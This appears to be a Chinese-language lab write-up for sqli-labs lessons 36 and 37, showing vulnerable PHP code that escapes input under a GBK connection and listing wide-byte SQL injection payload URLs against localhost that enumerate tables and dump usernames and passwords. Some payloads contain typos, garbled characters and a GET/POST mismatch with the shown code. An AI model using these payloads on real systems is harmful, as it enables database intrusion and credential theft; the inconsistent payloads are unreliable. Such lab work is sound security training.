0X1 查看源码

function check_quotes($string)
{
    $string= mysql_real_escape_string($string);    
    return $string;
}

// take the variables 
if(isset($_GET['id']))
{
$id=check_quotes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";

//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

从上面看到,这次采用了mysql_real_escape_string函数

0x2 函数讲解

(1)介绍

  mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
(2)字符受影响:

     \x00   \n   \r    \    '   "     \x1a

  如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。

0x3开始注入

   (1)由于源代码中并没有设置成UTF8,任然是gbk,所以mysql_real_escape_string()依旧能够被突破。方法和上述是一样的

mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);

(2)开搞 先来个and 1=1 和1=2

 

其他的Payload如下 (部分童鞋在windows下会出现报错,还是因为apache的问题,具体怎么解决目前我还没找到好的方法,如果有已经解决的欢迎留下方法)

 

http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 and1=1--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 and1=1--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 oder by 3--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=0%df%27 union select 1,2,3--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 union select 1,database(),3--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=1%df%27 union select 1,(select group_concat(username,password) from users),3--+

 

0x4 第三十七关

 

这一关方式是一样的,只是将两个参数都进行了过滤,绕过方式同样34关同样

if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname1=$_POST['uname'];
    $passwd1=$_POST['passwd'];

        //echo "username before addslashes is :".$uname1 ."<br>";
        //echo "Input password before addslashes is : ".$passwd1. "<br>";
        
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname1);
    fwrite($fp,'Password:'.$passwd1."\n");
    fclose($fp);
        
        $uname = mysql_real_escape_string($uname1);
        $passwd= mysql_real_escape_string($passwd1);
        
        //echo "username after addslashes is :".$uname ."<br>";
        //echo "Input password after addslashes is : ".$passwd;    

    // connectivity 
    mysql_query("SET NAMES gbk");
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

payload:

http://localhost:81/sqli-labs-master/Less-37/index.php?id=1' and1=1--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=1�' and1=1--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=1' oder by 2--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=0�' union select 1,2--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=0' union select 1,database()--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=0�' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
http://localhost:81/sqli-labs-master/Less-37/index.php?id=0�' union select 1,(select group_concat(username,password) from users)--+